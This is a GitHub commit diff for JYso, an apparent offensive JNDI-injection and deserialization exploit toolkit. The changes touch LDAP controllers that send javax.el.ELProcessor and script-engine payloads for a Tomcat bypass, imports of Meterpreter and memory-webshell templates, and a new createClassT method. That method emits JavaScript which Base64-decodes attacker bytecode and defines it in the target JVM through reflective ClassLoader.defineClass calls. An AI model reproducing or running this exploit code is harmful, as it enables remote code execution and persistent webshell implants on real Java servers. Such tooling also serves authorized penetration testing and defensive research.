Skip to content

Commit

Permalink
Add constructor
Browse files Browse the repository at this point in the history
  • Loading branch information
qi4L committed May 29, 2024
1 parent 751035c commit 72a91dd
Show file tree
Hide file tree
Showing 72 changed files with 681 additions and 363 deletions.
Binary file modified .gradle/8.7/checksums/checksums.lock
Binary file not shown.
Binary file modified .gradle/8.7/executionHistory/executionHistory.bin
Binary file not shown.
Binary file modified .gradle/8.7/executionHistory/executionHistory.lock
Binary file not shown.
Binary file modified .gradle/8.7/fileHashes/fileHashes.bin
Binary file not shown.
Binary file modified .gradle/8.7/fileHashes/fileHashes.lock
Binary file not shown.
Binary file modified .gradle/8.7/fileHashes/resourceHashesCache.bin
Binary file not shown.
Binary file modified .gradle/buildOutputCleanup/buildOutputCleanup.lock
Binary file not shown.
Binary file modified .gradle/file-system.probe
Binary file not shown.
2 changes: 1 addition & 1 deletion build.gradle
Original file line number Diff line number Diff line change
Expand Up @@ -101,7 +101,7 @@ dependencies {
}

group = 'org.example'
version = '1.3.0'
version = '1.3.1'
description = 'JYso'
java.sourceCompatibility = JavaVersion.VERSION_1_8

Expand Down
3 changes: 2 additions & 1 deletion src/main/java/com/qi4l/jndi/controllers/BasicController.java
Original file line number Diff line number Diff line change
Expand Up @@ -9,7 +9,8 @@
import com.qi4l.jndi.gadgets.utils.Util;
import com.qi4l.jndi.gadgets.utils.handle.ClassNameHandler;
import com.qi4l.jndi.template.CommandTemplate;
import com.qi4l.jndi.template.echo.Meterpreter;
import com.qi4l.jndi.template.echoStatic.Meterpreter;
import com.qi4l.jndi.template.echoStatic.TomcatEcho;
import com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult;
import com.unboundid.ldap.sdk.Entry;
import com.unboundid.ldap.sdk.LDAPResult;
Expand Down
Original file line number Diff line number Diff line change
Expand Up @@ -8,7 +8,6 @@
import com.qi4l.jndi.gadgets.utils.InjShell;
import com.qi4l.jndi.gadgets.utils.Util;
import com.qi4l.jndi.gadgets.utils.handle.ClassNameHandler;
import com.qi4l.jndi.template.echo.TomcatEchoJndi;
import com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult;
import com.unboundid.ldap.sdk.Entry;
import com.unboundid.ldap.sdk.LDAPResult;
Expand All @@ -31,7 +30,7 @@ public class TomcatBypassController implements LdapController {
@Override
public void sendResult(InMemoryInterceptedSearchResult result, String base) throws Exception {
try {
System.out.println(ansi().render("@|green [+] Sending LDAP ResourceRef result for|@" + base + " @|green with javax.el.ELProcessor payload|@"));
System.out.println(ansi().render("@|green [+] Sending LDAP ResourceRef result for |@" + base + " @|green with javax.el.ELProcessor payload|@"));
System.out.println("-------------------------------------- JNDI Local Refenrence Links --------------------------------------");
Entry e = new Entry(base);
e.addAttribute("javaClassName", "java.lang.String");
Expand All @@ -49,8 +48,7 @@ public void sendResult(InMemoryInterceptedSearchResult result, String base) thro
if (payloadType.contains("M-")) {
String ClassName1 = payloadType.substring(payloadType.indexOf('-') + 1);
InjShell.init(params);
Class<?> classQ = Gadgets.createClassT(ClassName1).getClass();
code = InjShell.injectClass(classQ);
code = Gadgets.createClassT(ClassName1);
}

if (payloadType.contains("command")) {
Expand All @@ -61,9 +59,6 @@ public void sendResult(InMemoryInterceptedSearchResult result, String base) thro
code = helper.injectMeterpreter();
}

if (payloadType.contains("TomcatEcho111")) {
code = helper.injectTomcatEchoTemplate();
}

String payloadTemplate = "{" +
"\"\".getClass().forName(\"javax.script.ScriptEngineManager\")" +
Expand Down Expand Up @@ -150,10 +145,6 @@ public String injectMeterpreter() throws ClassNotFoundException, NoSuchFieldExce
return InjShell.injectClass(ctClazz);
}

public String injectTomcatEchoTemplate() throws ClassNotFoundException, NoSuchFieldException, IllegalAccessException {
return InjShell.injectClass(TomcatEchoJndi.class);
}

public String getExecCode(String cmd) throws IOException {

String code = "var strs=new Array(3);\n" +
Expand Down
Original file line number Diff line number Diff line change
Expand Up @@ -57,8 +57,7 @@ public void sendResult(InMemoryInterceptedSearchResult result, String base) thro
if (payloadType.contains("M-")) {
String ClassName1 = payloadType.substring(payloadType.indexOf('-') + 1);
InjShell.init(params);
Class<?> classQ = Gadgets.createClassT(ClassName1);
code = InjShell.injectClass(classQ);
code = Gadgets.createClassT(ClassName1);
}

if (payloadType.contains("command")) {
Expand Down
10 changes: 5 additions & 5 deletions src/main/java/com/qi4l/jndi/gadgets/utils/Cache.java
Original file line number Diff line number Diff line change
@@ -1,12 +1,12 @@
package com.qi4l.jndi.gadgets.utils;

import com.qi4l.jndi.template.echo.Meterpreter;
import com.qi4l.jndi.template.echo.SpringEcho;
import com.qi4l.jndi.template.echo.TomcatEcho;
import com.qi4l.jndi.template.echoStatic.Meterpreter;
import com.qi4l.jndi.template.echoStatic.SpringEcho;
import com.qi4l.jndi.template.echoStatic.TomcatEcho;
import com.qi4l.jndi.template.isOK;
import com.qi4l.jndi.template.isSuccess;
import com.qi4l.jndi.template.memshell.Websphere.WebsphereMemshellTemplate;
import com.qi4l.jndi.template.memshell.jboss.JBFMSFromContextF;
import com.qi4l.jndi.template.memshellStatic.Websphere.WebsphereMemshellTemplate;
import com.qi4l.jndi.template.memshellStatic.jboss.JBFMSFromContextF;
import net.jodah.expiringmap.ExpirationPolicy;
import net.jodah.expiringmap.ExpiringMap;

Expand Down
Original file line number Diff line number Diff line change
@@ -1,7 +1,7 @@
package com.qi4l.jndi.gadgets.utils;

import com.qi4l.jndi.gadgets.Config.Config;
import com.qi4l.jndi.template.echo.Meterpreter;
import com.qi4l.jndi.template.echoStatic.Meterpreter;
import javassist.*;

import java.io.*;
Expand Down
21 changes: 19 additions & 2 deletions src/main/java/com/qi4l/jndi/gadgets/utils/Gadgets.java
Original file line number Diff line number Diff line change
Expand Up @@ -7,10 +7,12 @@
import javassist.CtClass;
import javassist.CtConstructor;

import java.io.ByteArrayOutputStream;
import java.lang.reflect.Array;
import java.lang.reflect.Constructor;
import java.lang.reflect.InvocationHandler;
import java.lang.reflect.Proxy;
import java.util.Base64;
import java.util.HashMap;
import java.util.Map;

Expand Down Expand Up @@ -153,7 +155,7 @@ public static Object createTemplatesImpl(String command) throws Exception {
return templates;
}

public static Class<?> createClassT(String command) throws Exception {
public static String createClassT(String command) throws Exception {
command = command.trim();

// 支持单双引号
Expand Down Expand Up @@ -203,7 +205,22 @@ public static Class<?> createClassT(String command) throws Exception {
}
}

return ctClass.getClass();
byte[] bytes = ctClass.toBytecode();
String classCode = Base64.getEncoder().encodeToString(bytes);
//System.out.println("Base64 Encoded CtClass: " + classCode);
ctClass.detach();

return "var bytes = org.apache.tomcat.util.codec.binary.Base64.decodeBase64('" + classCode + "');\n" +
"var classLoader = java.lang.Thread.currentThread().getContextClassLoader();\n" +
"try{\n" +
" var clazz = classLoader.loadClass('" + ctClass.getName() + "');\n" +
" clazz.newInstance();\n" +
"}catch(err){\n" +
" var method = java.lang.ClassLoader.class.getDeclaredMethod('defineClass', ''.getBytes().getClass(), java.lang.Integer.TYPE, java.lang.Integer.TYPE);\n" +
" method.setAccessible(true);\n" +
" var clazz = method.invoke(classLoader, bytes, 0, bytes.length);\n" +
" clazz.newInstance();\n" +
"};";
}

public static String createClassB(String command) throws Exception {
Expand Down
3 changes: 1 addition & 2 deletions src/main/java/com/qi4l/jndi/gadgets/utils/InjShell.java
Original file line number Diff line number Diff line change
Expand Up @@ -2,7 +2,7 @@

import com.qi4l.jndi.gadgets.Config.Config;
import com.qi4l.jndi.template.Agent.WinMenshell;
import com.qi4l.jndi.template.memshell.tomcat.TSMSFromJMXF;
import com.qi4l.jndi.template.memshellStatic.tomcat.TSMSFromJMXF;
import javassist.*;
import org.apache.commons.cli.CommandLine;
import org.apache.commons.cli.CommandLineParser;
Expand All @@ -16,7 +16,6 @@

import static com.qi4l.jndi.gadgets.Config.MemShellPayloads.*;
import static com.qi4l.jndi.gadgets.utils.HexUtils.generatePassword;
import static com.qi4l.jndi.template.memshell.shell.MemShellPayloads.SUO5.CMD_SHELL_FOR_WEBFLUX;

public class InjShell {

Expand Down
2 changes: 1 addition & 1 deletion src/main/java/com/qi4l/jndi/gadgets/utils/Util.java
Original file line number Diff line number Diff line change
@@ -1,6 +1,6 @@
package com.qi4l.jndi.gadgets.utils;

import com.qi4l.jndi.template.echo.Meterpreter;
import com.qi4l.jndi.template.echoStatic.Meterpreter;

import java.io.ByteArrayOutputStream;
import java.io.IOException;
Expand Down
146 changes: 0 additions & 146 deletions src/main/java/com/qi4l/jndi/template/echo/TomcatEchoJndi.java

This file was deleted.

Loading

0 comments on commit 72a91dd

Please sign in to comment.